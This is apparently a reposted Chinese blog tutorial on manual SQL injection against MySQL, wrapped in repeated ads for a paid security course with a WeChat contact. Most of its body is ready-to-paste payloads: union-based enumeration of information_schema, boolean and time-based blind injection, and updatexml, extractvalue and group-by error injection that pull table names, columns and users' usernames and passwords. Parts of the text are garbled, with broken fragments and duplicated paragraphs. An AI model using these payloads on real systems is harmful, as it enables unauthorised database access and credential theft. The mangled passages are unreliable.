当前位置:   article > 正文

手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨_sql注入登录语句

sql注入登录语句

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

’ or 1=1 union select 1,(select count(*) from information_schema.columns where table_name = ‘flag’ limit 0,1),3 limit 1,2;#–


.查flag表列的名字



  • 1
  • 2
  • 3
  • 4
  • 5

’ or 1=1 union select 1,(select column_name from information_schema.columns where table_name = ‘flag’ limit 0,1),3 limit 1,2;#–


查flag表记录的数量



  • 1
  • 2
  • 3
  • 4
  • 5

’ or 1=1 union select 1,(select count(*) from flag),3 limit 1,2;#–


查flag表记录值



  • 1
  • 2
  • 3
  • 4
  • 5

’ or 1=1 union select 1,(select flag from flag limit 0,1),3 limit 1,2;#–




---


### 5、获取数据库中的表


在获取到当前数据库名后,我们可以进一步获取其中表的信息。如下代码和截图所示,展示了获取数据库中表的信息,information\_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。information\_schema的tables表记录了数据库中表的信息,指定table\_schema的名称即可显示对应数据库中表的信息



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

1’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=database() #


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/8bb356f67b7a4cd7a9812b534af2b938.png)


### 6、获取表中的字段名


进一步获取其中的字段名,假设要获取的表为users,如下面的代码和截图所示。information\_schema的columns表存储了表中列的信息,也就是表中字段信息,指定table\_name表名,即可获取到对应表的字段信息。



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

1’ union select 1, c’c’c’c’c获取字段信息:
1’ union select 1, 2, group_concat(字段名) from 表名字#
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1(查找admin表的第一列字段)


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/662c554aee51480cb9859d524c02da89.png)


### 8.布尔盲注:


**无回显位:**



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

?id=1’and length((select database()))>9–+
#大于号可以换成小于号或者等于号,主要是判断数据库的长度。


lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and ascii(substr((select database()),1,1))=115–+


`#substr("78909",1,1)=7 substr(a,b,c)a`是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。  
 ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

?id=1’and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13–+


**判断所有表名字符长度。**



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99–+


**逐一判断表名**



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’))>20–+


**判断所有字段名的长度**



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),1,1))>99–+


**逐一判断字段名。**



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’ and length((select group_concat(username,password) from users))>109–+


**判断字段内容长度**



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’ and ascii(substr((select group_concat(username,password) from users),1,1))>50–+


**逐一检测内容。**


### 8.时间盲注:



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

?id=1’ and if(1=1,sleep(5),1)–+


**判断参数构造。**



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and if(length((select database()))>9,sleep(5),1)–+


判断数据库名长度



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and if(ascii(substr((select database()),1,1))=115,sleep(5),1)–+


逐一判断数据库字符



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+


判断所有表名长度



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+


逐一判断表名



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’))>20,sleep(5),1)–+


判断所有字段名的长度



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),1,1))>99,sleep(5),1)–+


逐一判断字段名。



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’ and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+


判断字段内容长度



  • 1
  • 2
  • 3
  • 4
  • 5

?id=1’ and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+


逐一检测内容。


### 9.updatexml报错注入:



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

123’ and (updatexml(1,concat(0x5c,version(),0x5c),1))# 爆版本
123’ and (updatexml(1,concat(0x5c,database(),0x5c),1))# 爆数据库
123’ and (updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1))# 爆表名
123’ and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name =‘users’),0x5c),1))#爆字段名
123’ and (updatexml(1,concat(0x5c,(select password from (select password from users where username=‘admin1’) b),0x5c),1))#爆密码该格式针对mysql数据库。


爆其他表就可以,下面是爆emails表



  • 1
  • 2
  • 3
  • 4
  • 5

123’ and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name =‘emails’),0x5c),1))#



  • 1
  • 2

1’ and (updatexml (1,concat(0x5c,(select group_concat(id,email_id) from emails),0x5c),1))# 爆字段内容。


### 10.Extractvalue报错注入:



  • 1
  • 2
  • 3
  • 4
  • 5

1’ and (extractvalue(1,concat(0x5c,version(),0x5c)))# 爆版本

1’ and (extractvalue(1,concat(0x5c,database(),0x5c)))# 爆数据库

1’ and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 爆表名

1’ and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),0x5c)))#
爆字段名

1’ and (extractvalue(1,concat(0x5c,(select password from (select password from users where username=‘admin1’) b) ,0x5c)))# 爆字段内容该格式针对mysql数据库。

1’ and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))# 爆字段内容。


### 11.groupby报错注入



  • 1
  • 2
  • 3
  • 4
  • 5

123’ and (select count(*) from information_schema.tables group by concat(database(),0x5c,floor(rand(0)*2)))# 爆数据库
123’ and (select count(*) from information_schema.tables group by concat(version(),0x5c,floor(rand(0)*2)))# 爆数据库版本
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

c46df24091ce3c9a5032a9919b755.jpeg)

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-ynRKaDJd-1713246416715)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/761643
推荐阅读
相关标签
  

闽ICP备14008679号